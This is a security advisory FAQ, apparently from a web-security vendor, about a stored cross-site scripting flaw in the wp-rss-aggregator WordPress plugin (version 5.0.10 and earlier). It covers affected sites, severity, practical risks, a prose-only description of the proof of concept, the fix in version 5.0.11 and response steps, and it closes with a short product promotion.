The vulnerability occurs due to insufficient input sanitization and output escaping on user-supplied attributes in the wp-rss-aggregator shortcode. Authenticated attackers can create or modify posts to include malicious shortcodes, which store the injected scripts and execute them when other users view the affected pages.
Who is affected by this vulnerability?
Identifying vulnerable users and sites
Any WordPress site using the wp-rss-aggregator plugin version 5.0.10 or earlier is affected. Specifically, authenticated users with contributor-level access and above can exploit this vulnerability, potentially affecting all users who view the compromised posts.
How can I check if my site is vulnerable?
Steps to identify vulnerability presence
To check if your site is vulnerable, verify the version of the wp-rss-aggregator plugin in use. If it is version 5.0.10 or earlier, your site is at risk. Additionally, review posts for any suspicious shortcodes that may indicate exploitation.
How can I fix or mitigate this issue?
Recommended actions for site administrators
To fix this vulnerability, update the wp-rss-aggregator plugin to version 5.0.11 or later, which includes the necessary security patches. Regularly updating plugins and monitoring user permissions can help mitigate similar risks.
What does the CVSS score of 6.4 signify?
Understanding the severity level
A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it is not the highest risk, it still poses a significant threat that could lead to unauthorized actions and should be addressed promptly.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites. Since contributors can inject scripts that execute in the context of higher-level users, this could enable privilege escalation attacks.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves an authenticated user crafting a malicious shortcode that includes JavaScript. When this shortcode is executed on a page, it triggers the JavaScript payload, demonstrating how an attacker can exploit the vulnerability to execute arbitrary code.
What steps should I take after updating the plugin?
Post-update actions for security
After updating to the patched version of the plugin, review your site’s posts for any previously injected malicious shortcodes. Additionally, consider conducting a security audit to ensure no other vulnerabilities exist and that user permissions are appropriately set.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, regularly update all WordPress plugins and themes, implement strong user role management, and utilize security plugins that monitor for suspicious activity. Training users on security best practices can also reduce the risk of exploitation.
What should I do if I suspect exploitation of this vulnerability?
Response to potential security incidents
If you suspect that your site has been exploited, immediately remove any suspicious shortcodes, change user passwords, and review user roles. It may also be necessary to restore from a clean backup and conduct a thorough security investigation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations